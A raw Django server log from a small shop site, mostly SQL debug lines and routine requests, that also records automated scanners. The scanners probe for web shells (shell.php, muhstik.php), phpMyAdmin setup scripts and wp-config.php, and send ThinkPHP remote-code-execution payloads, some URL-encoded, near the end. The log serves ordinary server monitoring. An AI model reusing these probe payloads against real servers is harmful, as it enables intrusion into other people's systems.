"shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-21 19:23:19,714 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-21 19:23:19,716 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-21 19:23:19,719 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-21 19:23:19,722 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-21 19:23:19,724 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [21/Dec/2019 19:23:19] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [21/Dec/2019 19:23:20] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [21/Dec/2019 19:23:20] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [21/Dec/2019 19:24:20] "GET / HTTP/1.0" 302 0 [21/Dec/2019 19:29:23] "GET / HTTP/1.0" 302 0 [21/Dec/2019 19:35:58] "GET / HTTP/1.0" 302 0 Not Found: /TP/public/index.php [21/Dec/2019 19:42:27] "GET /TP/public/index.php HTTP/1.0" 404 6477 Not Found: /TP/index.php [21/Dec/2019 19:42:27] "GET /TP/index.php HTTP/1.0" 404 6456 Not Found: /thinkphp/html/public/index.php [21/Dec/2019 19:42:28] "GET /thinkphp/html/public/index.php HTTP/1.0" 404 6510 Not Found: /html/public/index.php [21/Dec/2019 19:42:28] "GET /html/public/index.php HTTP/1.0" 404 6483 Not Found: /public/index.php [21/Dec/2019 19:42:29] "GET /public/index.php HTTP/1.0" 404 6468 Not Found: /TP/html/public/index.php [21/Dec/2019 19:42:29] "GET /TP/html/public/index.php HTTP/1.0" 404 6492 Not Found: /elrekt.php [21/Dec/2019 19:42:29] "GET /elrekt.php HTTP/1.0" 404 6450 Not Found: /index.php [21/Dec/2019 19:42:30] "GET /index.php HTTP/1.0" 404 6447 [21/Dec/2019 19:42:30] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-21 19:42:31,390 utils 4252 140031732287232 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'd22ou9rak4zkg880v33dmguwqkxanqd2' LIMIT 1; args=('d22ou9rak4zkg880v33dmguwqkxanqd2',) DEBUG 2019-12-21 19:42:31,393 utils 4252 140031732287232 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('d22ou9rak4zkg880v33dmguwqkxanqd2', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-04T19:42:31.391143+00:00'::timestamptz); args=('d22ou9rak4zkg880v33dmguwqkxanqd2', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 4, 19, 42, 31, 391143, tzinfo=)) [21/Dec/2019 19:42:31] "GET /login/?next=/ HTTP/1.0" 200 1786 [21/Dec/2019 19:45:04] "GET / HTTP/1.0" 302 0 [21/Dec/2019 19:50:07] "GET / HTTP/1.0" 302 0 [21/Dec/2019 19:55:54] "GET / HTTP/1.0" 302 0 [21/Dec/2019 20:05:03] "GET / HTTP/1.0" 302 0 [21/Dec/2019 20:10:05] "GET / HTTP/1.0" 302 0 [21/Dec/2019 20:15:44] "GET / HTTP/1.0" 302 0 [21/Dec/2019 20:20:24] "GET / HTTP/1.0" 302 0 [21/Dec/2019 20:20:59] "GET / HTTP/1.0" 302 0 [21/Dec/2019 20:26:02] "GET / HTTP/1.0" 302 0 [21/Dec/2019 20:31:05] "GET / HTTP/1.0" 302 0 [21/Dec/2019 20:38:27] "GET / HTTP/1.0" 302 0 [21/Dec/2019 20:43:30] "GET / HTTP/1.0" 302 0 [21/Dec/2019 20:48:32] "GET / HTTP/1.0" 302 0 [21/Dec/2019 20:48:36] "GET / HTTP/1.0" 302 0 [21/Dec/2019 20:53:35] "GET / HTTP/1.0" 302 0 [21/Dec/2019 20:53:48] "GET / HTTP/1.0" 302 0 [21/Dec/2019 20:55:01] "GET /whm-server-status HTTP/1.0" 301 0 [21/Dec/2019 21:00:01] "GET / HTTP/1.0" 302 0 [21/Dec/2019 21:05:03] "GET / HTTP/1.0" 302 0 [21/Dec/2019 21:11:46] "GET / HTTP/1.0" 302 0 [21/Dec/2019 21:15:01] "GET /whm-server-status HTTP/1.0" 301 0 [21/Dec/2019 21:16:49] "GET / HTTP/1.0" 302 0 [21/Dec/2019 21:25:01] "GET /whm-server-status HTTP/1.0" 301 0 [21/Dec/2019 21:25:11] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [21/Dec/2019 21:29:10] "GET /robots.txt HTTP/1.0" 404 6453 [21/Dec/2019 21:29:11] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-21 21:29:11,265 utils 4252 140031732287232 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'sh157cuuct0ssr4hm62f825o7l94yi0x' LIMIT 1; args=('sh157cuuct0ssr4hm62f825o7l94yi0x',) DEBUG 2019-12-21 21:29:11,267 utils 4252 140031732287232 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('sh157cuuct0ssr4hm62f825o7l94yi0x', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-04T21:29:11.265603+00:00'::timestamptz); args=('sh157cuuct0ssr4hm62f825o7l94yi0x', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 4, 21, 29, 11, 265603, tzinfo=)) [21/Dec/2019 21:29:11] "GET /login/?next=/ HTTP/1.0" 200 1786 [21/Dec/2019 21:30:14] "GET / HTTP/1.0" 302 0 [21/Dec/2019 21:35:17] "GET / HTTP/1.0" 302 0 [21/Dec/2019 21:40:19] "GET / HTTP/1.0" 302 0 [21/Dec/2019 21:45:57] "GET / HTTP/1.0" 302 0 [21/Dec/2019 21:52:11] "GET / HTTP/1.0" 302 0 [21/Dec/2019 21:57:14] "GET / HTTP/1.0" 302 0 [21/Dec/2019 22:05:03] "GET / HTTP/1.0" 302 0 [21/Dec/2019 22:10:05] "GET / HTTP/1.0" 302 0 [21/Dec/2019 22:15:08] "GET / HTTP/1.0" 302 0 [21/Dec/2019 22:20:11] "GET / HTTP/1.0" 302 0 [21/Dec/2019 22:26:00] "GET / HTTP/1.0" 302 0 [21/Dec/2019 22:27:30] "GET / HTTP/1.0" 302 0 [21/Dec/2019 22:32:33] "GET / HTTP/1.0" 302 0 [21/Dec/2019 22:37:35] "GET / HTTP/1.0" 302 0 [21/Dec/2019 22:42:38] "GET / HTTP/1.0" 302 0 [21/Dec/2019 22:48:11] "GET / HTTP/1.0" 302 0 [21/Dec/2019 22:49:22] "GET / HTTP/1.0" 302 0 Not Found: /wp-login.php [21/Dec/2019 22:50:48] "GET /wp-login.php HTTP/1.0" 404 6458 [21/Dec/2019 22:53:14] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [21/Dec/2019 22:53:16] "GET /robots.txt HTTP/1.0" 404 6451 Not Found: /User/User_Favorite.asp [21/Dec/2019 22:53:17] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=188 HTTP/1.0" 404 6532 Not Found: /newslist.asp [21/Dec/2019 22:53:19] "GET /newslist.asp?type=4&id=1235 HTTP/1.0" 404 6476 [21/Dec/2019 23:00:02] "GET / HTTP/1.0" 302 0 [21/Dec/2019 23:05:03] "GET / HTTP/1.0" 302 0 [21/Dec/2019 23:10:05] "GET / HTTP/1.0" 302 0 [21/Dec/2019 23:15:08] "GET / HTTP/1.0" 302 0 [21/Dec/2019 23:20:12] "GET / HTTP/1.0" 302 0 [21/Dec/2019 23:25:22] "GET / HTTP/1.0" 302 0 [21/Dec/2019 23:30:35] "GET / HTTP/1.0" 302 0 [21/Dec/2019 23:35:38] "GET / HTTP/1.0" 302 0 [21/Dec/2019 23:38:31] "GET / HTTP/1.0" 302 0 [21/Dec/2019 23:40:40] "GET / HTTP/1.0" 302 0 [21/Dec/2019 23:45:43] "GET / HTTP/1.0" 302 0 [21/Dec/2019 23:51:15] "GET / HTTP/1.0" 302 0 [21/Dec/2019 23:56:18] "GET / HTTP/1.0" 302 0 [22/Dec/2019 00:05:03] "GET / HTTP/1.0" 302 0 [22/Dec/2019 00:13:14] "GET / HTTP/1.0" 302 0 [22/Dec/2019 00:18:17] "GET / HTTP/1.0" 302 0 [22/Dec/2019 00:23:20] "GET / HTTP/1.0" 302 0 [22/Dec/2019 00:28:23] "GET / HTTP/1.0" 302 0 [22/Dec/2019 00:37:42] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [22/Dec/2019 00:38:51] "HEAD /robots.txt HTTP/1.0" 404 6454 [22/Dec/2019 00:42:14] "GET / HTTP/1.0" 302 0 [22/Dec/2019 00:42:44] "GET / HTTP/1.0" 302 0 [22/Dec/2019 00:48:01] "GET / HTTP/1.0" 302 0 [22/Dec/2019 00:49:34] "GET / HTTP/1.0" 302 0 [22/Dec/2019 00:57:40] "GET / HTTP/1.0" 302 0 [22/Dec/2019 01:05:03] "GET / HTTP/1.0" 302 0 [22/Dec/2019 01:10:05] "GET / HTTP/1.0" 302 0 Not Found: /user/register/ [22/Dec/2019 01:11:20] "GET /user/register/ HTTP/1.0" 404 6462 [22/Dec/2019 01:19:43] "GET / HTTP/1.0" 302 0 [22/Dec/2019 01:21:10] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-22 01:21:10,923 utils 4252 140031732287232 (0.005) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ucnxy77g1rt16fh90n7i7q4soqbnbc0p' LIMIT 1; args=('ucnxy77g1rt16fh90n7i7q4soqbnbc0p',) DEBUG 2019-12-22 01:21:10,926 utils 4252 140031732287232 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ucnxy77g1rt16fh90n7i7q4soqbnbc0p', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-05T01:21:10.924333+00:00'::timestamptz); args=('ucnxy77g1rt16fh90n7i7q4soqbnbc0p', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 5, 1, 21, 10, 924333, tzinfo=)) [22/Dec/2019 01:21:10] "GET /login/?next=/ HTTP/1.0" 200 1786 [22/Dec/2019 01:21:11] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-22 01:21:11,527 utils 4252 140031732287232 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'sgkld0uvoja4icvt5ejpgjze6jvxclfl' LIMIT 1; args=('sgkld0uvoja4icvt5ejpgjze6jvxclfl',) DEBUG 2019-12-22 01:21:11,528 utils 4252 140031732287232 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('sgkld0uvoja4icvt5ejpgjze6jvxclfl', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-05T01:21:11.527406+00:00'::timestamptz); args=('sgkld0uvoja4icvt5ejpgjze6jvxclfl', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 5, 1, 21, 11, 527406, tzinfo=)) [22/Dec/2019 01:21:11] "GET /login/?next=/ HTTP/1.0" 200 1786 [22/Dec/2019 01:21:12] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-22 01:21:13,494 utils 4252 140031732287232 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'lpafzrwskn7x4k7p5v9sdmemvrt29f01' LIMIT 1; args=('lpafzrwskn7x4k7p5v9sdmemvrt29f01',) DEBUG 2019-12-22 01:21:13,496 utils 4252 140031732287232 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('lpafzrwskn7x4k7p5v9sdmemvrt29f01', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-05T01:21:13.494921+00:00'::timestamptz); args=('lpafzrwskn7x4k7p5v9sdmemvrt29f01', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 5, 1, 21, 13, 494921, tzinfo=)) [22/Dec/2019 01:21:13] "GET /login/?next=/ HTTP/1.0" 200 1786 [22/Dec/2019 01:24:46] "GET / HTTP/1.0" 302 0 [22/Dec/2019 01:29:49] "GET / HTTP/1.0" 302 0 [22/Dec/2019 01:34:52] "GET / HTTP/1.0" 302 0 [22/Dec/2019 01:41:32] "GET / HTTP/1.0" 302 0 Not Found: /TP/public/index.php [22/Dec/2019 01:45:55] "GET /TP/public/index.php HTTP/1.0" 404 6477 Not Found: /TP/index.php [22/Dec/2019 01:45:55] "GET /TP/index.php HTTP/1.0" 404 6456 Not Found: /thinkphp/html/public/index.php [22/Dec/2019 01:45:56] "GET /thinkphp/html/public/index.php HTTP/1.0" 404 6510 Not Found: /html/public/index.php [22/Dec/2019 01:45:56] "GET /html/public/index.php HTTP/1.0" 404 6483 Not Found: /public/index.php [22/Dec/2019 01:45:56] "GET /public/index.php HTTP/1.0" 404 6468 Not Found: /TP/html/public/index.php [22/Dec/2019 01:45:57] "GET /TP/html/public/index.php HTTP/1.0" 404 6492 Not Found: /elrekt.php [22/Dec/2019 01:45:58] "GET /elrekt.php HTTP/1.0" 404 6450 Not Found: /index.php [22/Dec/2019 01:45:59] "GET /index.php HTTP/1.0" 404 6447 [22/Dec/2019 01:45:59] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-22 01:46:00,274 utils 4252 140031732287232 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'm7ffdfr9qo5n1b8vutjvrtaer2cihbzi' LIMIT 1; args=('m7ffdfr9qo5n1b8vutjvrtaer2cihbzi',) DEBUG 2019-12-22 01:46:00,276 utils 4252 140031732287232 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('m7ffdfr9qo5n1b8vutjvrtaer2cihbzi', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-05T01:46:00.275392+00:00'::timestamptz); args=('m7ffdfr9qo5n1b8vutjvrtaer2cihbzi', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 5, 1, 46, 0, 275392, tzinfo=)) [22/Dec/2019 01:46:00] "GET /login/?next=/ HTTP/1.0" 200 1786 [22/Dec/2019 01:46:36] "GET / HTTP/1.0" 302 0 [22/Dec/2019 01:51:38] "GET / HTTP/1.0" 302 0 [22/Dec/2019 01:58:01] "GET / HTTP/1.0" 302 0 [22/Dec/2019 02:03:27] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-22 02:03:27,599 utils 4252 140031732287232 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '0maccc0b4znf5iq9d8fycdwt6w5h0kpi' LIMIT 1; args=('0maccc0b4znf5iq9d8fycdwt6w5h0kpi',) DEBUG 2019-12-22 02:03:27,600 utils 4252 140031732287232 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('0maccc0b4znf5iq9d8fycdwt6w5h0kpi', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-05T02:03:27.599461+00:00'::timestamptz); args=('0maccc0b4znf5iq9d8fycdwt6w5h0kpi', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 5, 2, 3, 27, 599461, tzinfo=)) [22/Dec/2019 02:03:27] "GET /login/?next=/ HTTP/1.0" 200 1786 [22/Dec/2019 02:03:27] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-22 02:03:27,944 utils 4252 140031732287232 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '47nu1g3cnr164l0jgh4az15tek52yf2g' LIMIT 1; args=('47nu1g3cnr164l0jgh4az15tek52yf2g',) DEBUG 2019-12-22 02:03:27,945 utils 4252 140031732287232 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('47nu1g3cnr164l0jgh4az15tek52yf2g', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-05T02:03:27.944601+00:00'::timestamptz); args=('47nu1g3cnr164l0jgh4az15tek52yf2g', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 5, 2, 3, 27, 944601, tzinfo=)) [22/Dec/2019 02:03:27] "GET /login/?next=/ HTTP/1.0" 200 1786 [22/Dec/2019 02:05:02] "GET / HTTP/1.0" 302 0 [22/Dec/2019 02:10:49] "GET / HTTP/1.0" 302 0 [22/Dec/2019 02:15:52] "GET / HTTP/1.0" 302 0 [22/Dec/2019 02:21:35] "GET / HTTP/1.0" 302 0 [22/Dec/2019 02:26:59] "GET / HTTP/1.0" 302 0 [22/Dec/2019 02:36:58] "GET / HTTP/1.0" 302 0 [22/Dec/2019 02:42:03] "GET / HTTP/1.0" 302 0 [22/Dec/2019 02:50:06] "GET / HTTP/1.0" 302 0 [22/Dec/2019 02:55:08] "GET / HTTP/1.0" 302 0 [22/Dec/2019 03:05:02] "GET / HTTP/1.0" 302 0 [22/Dec/2019 03:12:01] "GET / HTTP/1.0" 302 0 [22/Dec/2019 03:17:04] "GET / HTTP/1.0" 302 0 [22/Dec/2019 03:22:06] "GET / HTTP/1.0" 302 0 [22/Dec/2019 03:27:09] "GET / HTTP/1.0" 302 0 [22/Dec/2019 03:35:31] "GET / HTTP/1.0" 302 0 [22/Dec/2019 03:40:33] "GET / HTTP/1.0" 302 0 [22/Dec/2019 03:45:36] "GET / HTTP/1.0" 302 0 [22/Dec/2019 03:53:36] "GET / HTTP/1.0" 302 0 [22/Dec/2019 03:58:39] "GET / HTTP/1.0" 302 0 [22/Dec/2019 04:05:01] "GET /whm-server-status HTTP/1.0" 301 0 [22/Dec/2019 04:05:03] "GET / HTTP/1.0" 302 0 [22/Dec/2019 04:07:33] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [22/Dec/2019 04:07:34] "GET /robots.txt HTTP/1.0" 404 6450 Not Found: /Adminb5512046/Login.php [22/Dec/2019 04:07:36] "POST /Adminb5512046/Login.php HTTP/1.0" 404 6490 [22/Dec/2019 04:07:36] "GET / HTTP/1.0" 302 0 Not Found: /l.php [22/Dec/2019 04:07:36] "GET /l.php HTTP/1.0" 404 6435 Not Found: /phpinfo.php [22/Dec/2019 04:07:37] "GET /phpinfo.php HTTP/1.0" 404 6453 Not Found: /test.php [22/Dec/2019 04:07:37] "GET /test.php HTTP/1.0" 404 6444 Not Found: /index.php [22/Dec/2019 04:07:38] "POST /index.php HTTP/1.0" 404 6448 Not Found: /forum.php [22/Dec/2019 04:07:40] "POST /forum.php HTTP/1.0" 404 6448 Not Found: /forums.php [22/Dec/2019 04:07:40] "POST /forums.php HTTP/1.0" 404 6451 Not Found: /bbs/index.php [22/Dec/2019 04:07:41] "POST /bbs/index.php HTTP/1.0" 404 6460 Not Found: /forum/index.php [22/Dec/2019 04:07:41] "POST /forum/index.php HTTP/1.0" 404 6466 Not Found: /forums/index.php [22/Dec/2019 04:07:42] "POST /forums/index.php HTTP/1.0" 404 6469 DEBUG 2019-12-22 04:07:42,980 utils 4252 140031732287232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'webdav'; args=('webdav',) Not Found: /webdav/ [22/Dec/2019 04:07:42] "GET /webdav/ HTTP/1.0" 404 1728 Not Found: /help.php [22/Dec/2019 04:07:44] "GET /help.php HTTP/1.0" 404 6444 Not Found: /java.php [22/Dec/2019 04:07:45] "GET /java.php HTTP/1.0" 404 6444 Not Found: /_query.php [22/Dec/2019 04:07:46] "GET /_query.php HTTP/1.0" 404 6450 Not Found: /test.php [22/Dec/2019 04:07:46] "GET /test.php HTTP/1.0" 404 6444 Not Found: /logon.php [22/Dec/2019 04:07:56] "GET /logon.php HTTP/1.0" 404 6447 Not Found: /license.php [22/Dec/2019 04:08:00] "GET /license.php HTTP/1.0" 404 6453 Not Found: /log.php [22/Dec/2019 04:08:00] "GET /log.php HTTP/1.0" 404 6441 Not Found: /hell.php [22/Dec/2019 04:08:05] "GET /hell.php HTTP/1.0" 404 6444 Not Found: /pmd_online.php [22/Dec/2019 04:08:05] "GET /pmd_online.php HTTP/1.0" 404 6462 Not Found: /x.php [22/Dec/2019 04:08:08] "GET /x.php HTTP/1.0" 404 6435 Not Found: /shell.php [22/Dec/2019 04:08:09] "GET /shell.php HTTP/1.0" 404 6447 Not Found: /b.php [22/Dec/2019 04:08:12] "GET /b.php HTTP/1.0" 404 6435 Not Found: /sane.php [22/Dec/2019 04:08:13] "GET /sane.php HTTP/1.0" 404 6444 Not Found: /desktop.ini.php [22/Dec/2019 04:08:14] "GET /desktop.ini.php HTTP/1.0" 404 6465 Not Found: /z.php [22/Dec/2019 04:08:15] "GET /z.php HTTP/1.0" 404 6435 Not Found: /lala.php [22/Dec/2019 04:08:15] "GET /lala.php HTTP/1.0" 404 6444 Not Found: /wpc.php [22/Dec/2019 04:08:20] "GET /wpc.php HTTP/1.0" 404 6441 Not Found: /wpo.php [22/Dec/2019 04:08:20] "GET /wpo.php HTTP/1.0" 404 6441 Not Found: /t6nv.php [22/Dec/2019 04:08:24] "GET /t6nv.php HTTP/1.0" 404 6444 Not Found: /muhstik.php [22/Dec/2019 04:08:24] "GET /muhstik.php HTTP/1.0" 404 6453 Not Found: /text.php [22/Dec/2019 04:08:28] "GET /text.php HTTP/1.0" 404 6444 Not Found: /wp-config.php [22/Dec/2019 04:08:28] "GET /wp-config.php HTTP/1.0" 404 6459 Not Found: /muhstik.php [22/Dec/2019 04:08:29] "GET /muhstik.php HTTP/1.0" 404 6453 Not Found: /muhstik2.php [22/Dec/2019 04:08:29] "GET /muhstik2.php HTTP/1.0" 404 6456 Not Found: /muhstiks.php [22/Dec/2019 04:08:32] "GET /muhstiks.php HTTP/1.0" 404 6456 Not Found: /muhstik-dpr.php [22/Dec/2019 04:08:32] "GET /muhstik-dpr.php HTTP/1.0" 404 6465 Not Found: /lol.php [22/Dec/2019 04:08:33] "GET /lol.php HTTP/1.0" 404 6441 Not Found: /uploader.php [22/Dec/2019 04:08:33] "GET /uploader.php HTTP/1.0" 404 6456 Not Found: /cmv.php [22/Dec/2019 04:08:35] "GET /cmv.php HTTP/1.0" 404 6441 Not Found: /cmdd.php [22/Dec/2019 04:08:37] "GET /cmdd.php HTTP/1.0" 404 6444 Not Found: /knal.php [22/Dec/2019 04:08:38] "GET /knal.php HTTP/1.0" 404 6444 Not Found: /shell.php [22/Dec/2019 04:08:40] "GET /shell.php HTTP/1.0" 404 6447 Not Found: /appserv.php [22/Dec/2019 04:08:40] "GET /appserv.php HTTP/1.0" 404 6453 Not Found: /scripts/setup.php [22/Dec/2019 04:08:41] "GET /scripts/setup.php HTTP/1.0" 404 6471 Not Found: /phpmyadmin/scripts/setup.php [22/Dec/2019 04:08:41] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 6504 Not Found: /phpMyAdmin/scripts/setup.php [22/Dec/2019 04:08:42] "GET /phpMyAdmin/scripts/setup.php HTTP/1.0" 404 6504 Not Found: /scripts/db___.init.php [22/Dec/2019 04:08:43] "GET /scripts/db___.init.php HTTP/1.0" 404 6486 Not Found: /pma/scripts/setup.php [22/Dec/2019 04:08:56] "GET /pma/scripts/setup.php HTTP/1.0" 404 6483 Not Found: /PMA/scripts/setup.php [22/Dec/2019 04:08:56] "GET /PMA/scripts/setup.php HTTP/1.0" 404 6483 Not Found: /myadmin/scripts/setup.php [22/Dec/2019 04:09:00] "GET /myadmin/scripts/setup.php HTTP/1.0" 404 6495 Not Found: /MyAdmin/scripts/setup.php [22/Dec/2019 04:09:00] "GET /MyAdmin/scripts/setup.php HTTP/1.0" 404 6495 Not Found: /pma/scripts/db___.init.php [22/Dec/2019 04:09:01] "GET /pma/scripts/db___.init.php HTTP/1.0" 404 6498 Not Found: /PMA/scripts/db___.init.php [22/Dec/2019 04:09:01] "GET /PMA/scripts/db___.init.php HTTP/1.0" 404 6498 Not Found: /myadmin/scripts/db___.init.php [22/Dec/2019 04:09:05] "GET /myadmin/scripts/db___.init.php HTTP/1.0" 404 6510 Not Found: /MyAdmin/scripts/db___.init.php [22/Dec/2019 04:09:05] "GET /MyAdmin/scripts/db___.init.php HTTP/1.0" 404 6510 Not Found: /plugins/weathermap/editor.php [22/Dec/2019 04:09:06] "GET /plugins/weathermap/editor.php HTTP/1.0" 404 6507 Not Found: /weathermap/editor.php [22/Dec/2019 04:09:08] "GET /weathermap/editor.php HTTP/1.0" 404 6483 Not Found: /index.php [22/Dec/2019 04:09:08] "GET /index.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.0" 404 6694 Not Found: /elrekt.php [22/Dec/2019 04:09:09] "GET /elrekt.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.0" 404 6697 DEBUG 2019-12-22 04:09:09,545 utils 4252 140031732287232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'App'; args=('App',) Not Found: /App/ [22/Dec/2019 04:09:09] "GET /App/?content=die(md5(HelloThinkPHP)) HTTP/1.0" 404 1754 Not Found: /index.php [22/Dec/2019 04:09:12] "GET /index.php?s=/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.0" 404 6503 [22/Dec/2019 04:09:12] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.0" 302 0 [22/Dec/2019 04:09:12] "GET / HTTP/1.0" 302 0 DEBUG 